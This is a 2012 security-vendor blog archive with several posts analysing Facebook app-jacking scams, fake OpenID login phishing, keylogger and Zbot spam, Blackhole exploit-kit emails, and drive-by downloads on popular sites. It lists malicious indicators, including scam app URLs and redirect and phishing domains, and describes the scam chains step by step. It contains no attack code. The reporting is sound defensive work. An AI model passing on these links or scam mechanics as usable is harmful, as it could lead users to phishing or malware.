See Who Viewed your Facebook Profile – Popular Facebook Scam Technique

May 10, 2012

by Jason Ding – Barracuda Labs

Many Facebook users have the same burning questions – who viewed their Facebook profile? And who viewed them the most?

Facebook has officially explained on its FAQ page, that such functionality is not provided either through its own platform nor other third party applications. However, the desire to for answers to these questions has grown continuously in last few years, generating lots of “business” opportunities for scammers and phishing attackers.

The scam uses curiosity as the hook to trick Facebook users into spamming their social networks. We bring out the Facebook Profile scam under the light again to explore it’s evolution on this giant social platform.

Remember several click-jacking attacks on Facebook last year?  Attackers used Facebook Open Graph API to create a big “like” button on a video screen to trick users into liking the page and then redirect them to register other affiliate paid services. Such scam techniques are old now, and it is easy for user to get rid of:  simply removing the related posts.

A new trend of scam, more advanced than click-jacking, has just started to become popular on Facebook. It also uses the “profile viewer” curiosity as the hook but creates Facebook apps to gain users information and permissions to post. The whole process works as follows.

Several photo posts are initially created with many tagged users and a bit.ly shortened link in the photo description.

Following the shortened link, it redirected several times (via a AWS S3 file, zoomdamx.com, and tikoroom.com), and then landed on a Facebook application permission page.

(click for larger image)

 

To install this profile viewer app “My Match”, you have to give certain permissions: basic information, access to photos and post on your behalf. Once you allow these permissions two things happen:  a) you will be redirected to a non-Facebook page requiring to take a survey to unlock the real app and b) a new album will be created in your pictures with the same scamming photo within which all your friends are tagged.

(click for full size image)

 

Now, all of your friends will see this photo and may be get tricked as well. To unlock the app, we need to fill the survey.  No big surprise, lot of affiliate advertisements and paid services are required to finish.

(click for full size image)

 

This is the interesting part now. If you clicks the link in your new photo auto-posted by this “My Match” app, another application also called “My Match” asks your permission. It seems that this particular app is able to generate new apps of its own kind on demand. Very sophisticated.

(click for larger image)

Fortunately, it is not the case. After several permission requests, we found this scam only has limited alternative paths to lead victims to a pool of pre-created scam applications, trying to avoid the detection from Facebook and other malicious analysis services.  Here are the four applications:

http://www.facebook.com/apps/application.php?id=215925598521769

http://www.facebook.com/apps/application.php?id=291003840984532

http://www.facebook.com/apps/application.php?id=163011840492520

http://www.facebook.com/apps/application.php?id=257527217679114

Whenever this app is used (even not finishing a survey), a new album tagging all of your friends will be created, along with another bit.ly URL in the description, trying to trick new victims. See the album page in the following image, captured when we tried to find all these “scam” applications.  I’ll bet all of my friends are upset.

(click for larger size image)

Obviously, compared to click-jacking, this new scam is more advanced and has more impact on your network. Even more serious is the fact that the apps owners can access and control more information revealed by you. Meanwhile, these scam apps obey the ToS of Facebook: they only post given permissions.

To avoid detection or banning, the attacker used several intermediate URLs for redirection: 1) a bit.ly shortened URL, 2) a Amazon S3 URL, 3) two newly registered domains. The two transitional domains zoomdamx.com and tikoroom.com are both recently registered with an India address on April 25, 2012 and May 1, 2012, respectively.

To stop you and others being victims of this app-jacking scam, two actions need to be taken: revoke the permissions for “My Match” and remove all auto-posted albums. Go to Account Settings after logging in Facebook, click Apps on the left panel, and then click “Edit” link for every “My Match” app. Now click “Remove” link first to remove all post made by this app, and then click “Remove app” link to revoke the permission.

(click for larger image)

 

To summarize, click-jacking is old news now. This app-jacking might be a new trend for scammers for a while, until Facebook takes strong actions to scrutinize app creation.

 

Share

Posted in Hot Security Topics- HST, Internet Security Tips, Social Networking | No Comments »

New spam campaign mimics OpenID, steals credentials

May 4, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Spammers and Phishers are constantly looking for ways to convince people to type in their passwords and press “Log In”.  One of the newest strategies we’ve seen them use are specially crafted login pages that appear similar to those of websites that use the increasingly popular OpenID standard.  An alarming number of spammers are tailoring their phishing messages to use this new template.

OpenID is way for websites to avoid having to create their own user accounts.  Instead, they use authentication services offered by better known OpenID ‘providers’.  You’ve very likely seen websites offering to allow you to log in using your Facebook or Google or Yahoo account. The website passes control to a selected provider such as Yahoo.  You enter your credentials on a secure page hosted by Yahoo. The website then receives a message back indicating that you supplied valid login credentials.  That is OpenID in action.

 

Sample OpenID signin

Sample OpenID sign in dialog

Note that the dialog expressly informs you that you will be visiting Yahoo to log in.  This is an important point to keep in mind.

 

What we are seeing at Barracuda Labs are messages that direct you to web pages that appear similar to OpenID portal pages. Take this spam email as an example.  What could be the harm in some Real Estate listings?

Spam

A real estate company logo is used, the text is vague and the link leads to the compromised website of a yacht service company in Australia. That site serves up this fake login page. While this page does not mention OpenID itself, the increasing acceptance of OpenID makes this page appear much less threatening and more ‘normal’.

Fake login page

(click for full size image)

We selected Yahoo and were immediately prompted for our Yahoo credentials via a bit of Javascript on the page.  As mentioned above, this is not how OpenID authentication works.  With genuine OpenID authentication we would be directed to a secure Yahoo web page which would ask for credentials.

Instead, our credentials are unceremoniously sent back to the compromised server in plain text, as shown by this captured TCP stream.

Packet capture

(click for larger image)

Eventually these credentials make their way back to the Phisher.  In the meantime, the browser continues on to the real homepage of a real estate company.

Another example presents itself as a UPS notification email which leads to a fake UPS login page.

 

There are excellent reasons to use OpenID.   Website administrators don’t have to store and care for a password for your account, and you can reduce the number of of user accounts and passwords that you manage.

The flip side is that if you are going to choose to use an OpenID provider, such as your favorite email account, you need to be very observant and make certain that your credentials are being requested using a secure connection to the provider’s servers.

 

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

 

 

 

 

 

 

Share

Posted in Email Security, Security, Spam, Web Security | No Comments »

@TakeDownCon Twitter account comprised?

April 25, 2012

by Jason Ding, Research Scientist

It is not rare for general Internet users to get their online accounts spammed, compromised or hacked due to their less knowledge about the dangerousness of the Web.

However, network security professionals should at least have enough knowledge and take strong precaution to protect their own online accounts, before helping others, or hosting hacking events.

Unfortunately, this is not always true. Check this live example: TakeDownCon, “a technical security conference series fundamentally developed to focus on only ONE information security domain per event” – just got its Twitter account @TakeDownCon comprised. It sent direct messages to its followers, and posted spam tweets on its own timeline.

The example of the direct message is as following:


The spam tweets on @TakeDownCon:


The URL in the message will direct users to a phishing website stealing Twitter credentials:


This phishing website domain itvvitier[.]com is newly registered to an address in Shanghai, China, since April 23, 2012.

Anyone who received these messages should ignore and delete them immediately. As always, do not click any links in your emails or messages if you are not 100% sure of their origin or intent. And always, carefully check the URL in your browser’s address bar whenever you login to a website.

 

UPDATE: as of this morning Apr 26 2012 8AM EST, @TakeDownCon has removed the spam tweets on its page and the phishing website itvvitier[.]com is down.

Share

Posted in phishing, Social Networking, Spam, Uncategorized | No Comments »

Political rhetoric ramps up and so does President Obama related spam

April 16, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

If you’re a malware spammer, the number one challenge you face is how to get people to open, read and follow links in your message.

To accomplish this, one of the driving emotions that spammers appeal to is curiosity.   For years spammers have sent emails offering glimpses of gory accidents, scantily clad women and outrageous celebrity behavior – anything that might get you to drop your guard, suspend your critical thinking and click through some dodgy link in the hope of seeing some juicy nugget.

An excellent example of that fell into the Barracuda Labs spam traps recently.  It claimed that President Obama is a homosexual and offered an incriminating picture that would prove it. Who wouldn’t be curious about that?

Obama is gay email

We actually hope most people wouldn’t be.  The email is so obviously bogus you might think no one would click on the link. Well, in the interest of research, we did, and in our investigation we found that quite a few other people did as well.

Clicking on the link in the email and running the download is pretty anticlimactic.   The download attempts to divert your attention by opening cute picture of a koala bear.

distracting picture

(click for larger image)

Behind the scenes it silently installs a copy of a commercially available keylogger known as Perfect Keylogger.   This program monitors every program you run and every key stroke you enter. and stores them in a local file, like this example

Keystroke log file

(click for larger image)

Perfect Keylogger also captures screenshots periodically and stores them off to disk.    Every so often it gathers together the captured data and sends them to a remote server using the File Transfer Protocol (FTP).

Perfect Keylogger FTP traffic

(click for larger image)

FTP sends traffic in the clear, so it was possible for us to get a listing of the server that receives the keylogger data.

Keylogger FTP site

(click for larger image)

Only a few days after the spam was first seen there are a large number of folders on the keylogger website, each representing a person who clicked on the initial link and ran the downloaded program. It appears that outrageous headlines spurs curiosity which is effective in getting people to click on links and install malware.

The lesson here is not to let that curiosity get the better of you, even if the email and link appear to come from some trusted source.  If the content is designed to intrigue or titillate then there’s a good chance that the end result will be unpleasant.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

 

 

 

 

 

Share

Posted in Email Security, ID Theft, Internet Security Tips, Security, Web Security | No Comments »

Warning: New Facebook Phishing via Facebook Chat and Note

April 6, 2012

by Jason Ding, Research Scientist

Internet hackers never stop working hard to phish victims with new strategies, even on the coming Easter day. Last night, when one of our colleagues logged into his Facebook account to check around, he received the following two Facebook chat messages from his friends:

The text associated with these notes reads as follows:

hey, do you remember this photo? http://m.facebook.com/note.php?note_id=10150721776820528

hey, do you remember this photo? http://m.facebook.com/note.php?note_id=10150657346714077

As most Facebook users chat frequently to converse with their friends, this post is nothing special and  looks safe; it is a Facebook Note link. However once you click through, the note suggests another (non-Facebook) link to see your friend’s photo:

The links have the following text:

Click here to open photo > [http]://destinationats[.]com/photo-album/

If you follow this new link, you will be redirected to a website phishing your Facebook credentials or serving malicious content to install malware on your device. Either way, you are under potential attack. Unfortunately, we do not have a screenshot of the corresponding redirected site, but many Facebook users are already know of its maliciousness.

Note this twist is a different spin on a  previous attack, as the chat message contains a valid Facebook Note link. Most users will trust Facebook URLs and click them.

If you receive such messages, DO NOT click on their links. Tell your friends that their passwords might be compromised, and suggest they change their passwords immediately.

Further tracking shows that in this example, the attacking website domain is rmxdhd[.]com, which is registered to an address in Russia since April 5, 2012.  Fortunately, this domain is not resolvable at the moment.

Share

Posted in phishing, Social Networking, Web Security | No Comments »

Maliciousness in Top-ranked Alexa Domains

March 28, 2012

by Paul Royal, Research Consultant

For the infographic associated with this post, see http://www.barracudalabs.com/goodsitesbad.

At Barracuda Labs, we use a variety of research technologies to identify and study maliciousness on the web. One of these tools is an automated system that forces a web browser inside a Windows virtual machine to visit a URL to see what happens to the browser, its plugins, and the operating system. The resulting network-level actions of the virtual machine help us determine, without prior knowledge of specific exploits served to the browser or its extensions, whether a URL serves malicious content.

A few months ago we began using the above-described system to examine the Alexa 25,000 most popular domains. As these sites are popular and long-lived, many people assume that it is safe to visit them. However, automated examination of the Alexa top 25,000 each day for the month of February 2012-which found 58 sites serving drive-by download exploits-shows that this assumption does not always hold.

While Alexa does not publish the total number of page views it uses to determine site rankings, there exists sufficient information to determine that number. As an example, Wikipedia, which represented ~0.54% of total Alexa views in February 2012, reported ~15.75 billion views for the previous month. Working backwards, we can thus calculate that Alexa used an average of (15,756 * 1,000,000)/(29 * (0.5416/100)) = ~100.31 billion views each day to rank the popularity of websites.

Using the above number, we can calculate the affected views for a given site in a 24-hour period. As an example, free-tv-video-online[.]me, which via an ad network served visitors malicious content on February 13, represented ~0.0053% of the total Alexa views, which yields 5,366,895 affected views for that day. However, to estimate how many users were served exploit content, this number must be adjusted to account for the average number of views per user. Fortunately, Alexa makes this information available. Continuing with the example, free-tv-video-online[.]me has an average of 7.2 views per user. Thus, for this site, 5,366,895 views equates to 745,402 users served malicious content on February 13. Across all 58 sites that (directly or indirectly) served malicious content, there were 44,160,016 affected views from 10,541,379 users.

Of course, not every user served malicious content was compromised. To estimate the number of successfully exploited users, we used several different sources, including Wikipedia’s browser statistics. To begin, if we examine platform and browser popularity, only about half (or 50.81%) of users (who run Windows and IE or Firefox) possess properties conducive to exploitation.

To convert the number of possibly compromised users into those probably compromised, we conservatively adjusted according to the most popular mechanism of exploitation: the Java plugin. According to Adobe, 73% of PC users have the Java plugin installed. According to Qualys, 42% of users with the Java plugin installed have versions vulnerable to exploitation. Thus, of 10,541,379 users served malicious content, 42% (insecure Java) of 73% (Java installed) of 50.81% (Windows and Firefox/IE), or 1,642,172, were likely compromised.

In addition to our statistical analysis used to estimate the number of users compromised by visiting Alexa top-ranked domains that served malicious content, we offer the following summary observations:

  • On average, two of the Alexa top 25,000 domains serve malicious content each day. Statistically, that means at least one popular website will serve malicious content every day.
  • Alexa top-ranked domains served malicious content 23 (or 79%) of the days in February. That means this problem is not isolated and occurs on a continuous, regular basis.
  • Alexa top-ranked domains that served malicious content spanned across 18 different countries. That means this problem has no geographic barrier.
  • Over 97% of sites that served visitors malicious content were at least one year old; over half were on sites more than five years old. That means attackers use well-established, long-lived websites for their drive-by download campaigns.

A table that lists the 58 sites that served the visitor drive-by download exploits, including each site’s Alexa rank, when exploit content was served by the site, the number of affected views and users, and the subset that were likely compromised is available for download here. An archive containing packet capture (PCAP) files showing the exact sequence of events that led to system compromise can be obtained by requesting it through the Barracuda Labs Contact Form.

 

Share

Posted in Research, Security, Statistics, Web Security | No Comments »

Verizon bill for $954 attacks your computer

March 26, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

A bill from your cell phone company is routine, right? What about when the amount is unexpected – something like $954.19? That would sure get your attention, wouldn’t it? Assuming your carrier was Verizon, you might just find yourself anxiously clicking on one of the links in this convincing email.

Fake Verizon email

(click for larger image)

 

That would certainly be a mistake. Every link in this email leads to sites that host the Blackhole exploit kit, a web application that bombards your browser with malicious code that attempts to assume control and download malware. That is just what happened in our test environment.  After a series of attacks was delivered, a copy of Trojan.Zbot was downloaded.

Blackhole exploit traffic

(click for larger image)

The newest version of a well-known password stealer, Trojan.Zbot monitors your web browsing traffic looking for any username / password pairs, particularly ones associated with online banking, and quietly passes them back to a command and control center via a distributed peer-to-peer network.

As we repeatedly advise in this blog – Never click on links in emails.

You simply cannot tell when they might be good – or phishing – or outright malicious, like these.  Always open a fresh browser window and type in the name of the website you want to visit.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

 

 

 

 

 

Share

Posted in Anti-Spam, Email Security, Internet Security Tips, Security, Spam | No Comments »

Anonymous wants YOU!

March 19, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Uncle Anonymous

Anonymous is a loose coalition of Internet users who participate in international hacking activities, often targeting large security firms or opponents of digital piracy.

They’ve engaged in some high-profile successes lately, so imagine our surprise when we checked the Barracuda Labs spam traps and found that they are recruiting!

 

Even though none of us has answered the call yet, there is plenty of speculation about these widely distributed emails. Are they really from Anonymous members? Perhaps the FBI is looking for people who might answer the call.   Or it could just be someone trolling for mobile phone numbers, which can be abused by premium SMS scammers.

 

Whatever the case, Barracuda Networks customers using the Barracuda Spam & Virus Firewall will have to find some other way to join, because they won’t be receiving these emails.

Share

Posted in Anonymous, Anti-Spam, phishing, Security, Spam | No Comments »

Facebook promotes a phishing app when browsing Admiral James Stavridis’s Profile

March 15, 2012

by Jason Ding, Research Scientist

Admiral James Stavridis is under the spotlight of the social media stage since an anonymous phishing attack was launched on Facebook a few days ago using a fake version of his profile. It seems this is a good time to meet this commander (at least on-line), hence we did a simple study on his official Facebook page at: http://www.facebook.com/james.stavridis?sk=info

After logging in and searching for his name, we landed on his main page. A stylish military profile picture and many posts about his recent comments and visits. Everything seems very legit until we saw an app suggestion with an empty icon on the top right.

(click for larger image)


We click the promoted app to see what’s going on. The link brought us to an blank Facebook app page and then quickly redirected us to a non-Facebook url with a copycat Facebook login portal page. A Facebook account phishing website!!!

(click for larger image)

 

The phishing url is bed.funnypictureland.com, and whois check shows it was registered in CA on Feb 17, 2012. We found at least two phishing apps for this case:

[http]://apps.facebook.com/173881296059145/?ref=games_ego

[http]://apps.facebook.com/238028826286401/?ref=games_ego

This is a very popular trick to steal a user’s account, and has been rampant for some time. We are not sure what exactly these hackers will do with stolen accounts, but one possibility might be posting spamming comments or phishing app on their friends’ walls and photos. The victims will not notice their spamming behaviors until their friends tell them. See this example for an victim.

(click for larger image)

One important thing to clarify, this app promotion by Facebook may not be related to the page content that a user landed (Admiral Stavridis sure has nothing do to with this app), but based on the installed applications of the viewer. Our testing account did visit several “noisy” and “spreading” apps that show lots of ads on their app home pages, like http://apps.facebook.com/myquizz-lwgdvkthql , http://apps.facebook.com/bestieeev-sfcjrnzkcd. Many of these apps are created by “app auto-creating” apps which all have an easy 3-clickable-steps to create new apps.

It seems that Facebook allows an app or a Facebook page to automatically redirect to non-Facebook urls without any restrictions. On the bright side, other regular websites receive benefits from Facebook traffic; while the dark side is: social users live in Facebook walled garden for so long, and they simply trust everything that Facebook redirects to, leading to much higher chances to be tricked by spamming apps and pages.

 

Updates (03/15/2012 13:28 EST): Admiral James Stavridis’s Facebook page has just changed to timeline, so you might not be able to see app promotion on the side. But the two phishing apps are still available.

Share

Posted in phishing, Social Networking | No Comments »

Stratfor subscribers targeted by file stealing spam

March 14, 2012

by Dave Michmerhuizen & Luis Chapetti – Security Researchers

Stratfor Global Intel

Strategic Forecasting, Inc., also known as Stratfor, is a private intelligence-analysis firm based in Austin, Texas. In December of 2011 the hacker collective Anonymous compromised the company newsletter subscription database, making off with thousands of stolen logon credentials and credit card numbers.

Internet scammers are quick to fasten onto events like these, and the spam traps at Barracuda Labs have turned up messages targeting Stratfor subscribers. With a subject of “Stratfor: Beware of false communications”, these simple emails contain no text and carry an attached PDF file.

Stratfor related spam

The PDF file is not malicious, however; it contains a poorly worded message encouraging you to download an antivirus package (supposedly McAfee) and scan for a specific virus named Win32Azee.

Stratfor PDF message
(click for larger image)

There is no virus named Win32Azee, and the download isn’t McAfee antivirus. It isn’t an antivirus at all. It is a file stealer that McAfee identifies as PWS-Zbot.gen.ry. You do have to suspend your better judgement, download the file av.zip from a website in Poland and then give it permission to run and install itself. However, once that is done the malware gets right to work gathering up both files and stored passwords and sending them to a central drop point.

Stratfor file stealer pcap
(click for larger image)

The first step shown above is the gathering of usernames and passwords stored on the local system. After these are are uploaded, the local hard drives are scanned for .PDF, .XLS and .DOC files. Any files found are also uploaded to the remote site.

This malware doesn’t use any fancy encryption or obfuscation to transmit the stolen files. Instead, it uses the old-school FTP protocol which is in clear text.  We were able to log into the file repository and see the files stolen from our test machine.

 

File stealer site

(click for larger image)

We were also able to see that a non-trivial number of people have already done this.  Each directory name in the middle pane above corresponds to someone who has downloaded and run the malware.

Stratfor charges for their particularly valued intelligence, so subscribers are a pre-selected set of important individuals. It’s no surprise that malware distributors and data thieves are targeting them a second time.

Our advice is the same as it would be for any email user.   Don’t click on links in emails, no matter how convincing they might seem, and only install software from trusted verified sources.

 

Barracuda Networks customers using the Barracuda Spam & Virus Firewall are protected from these emails. Barracuda Web Filters and the Barracuda Web Security Flex service stop the download of this threat.

 

Share

Posted in Internet Security Tips, phishing, Security, Spam, Uncategorized | No Comments »

« Older Entries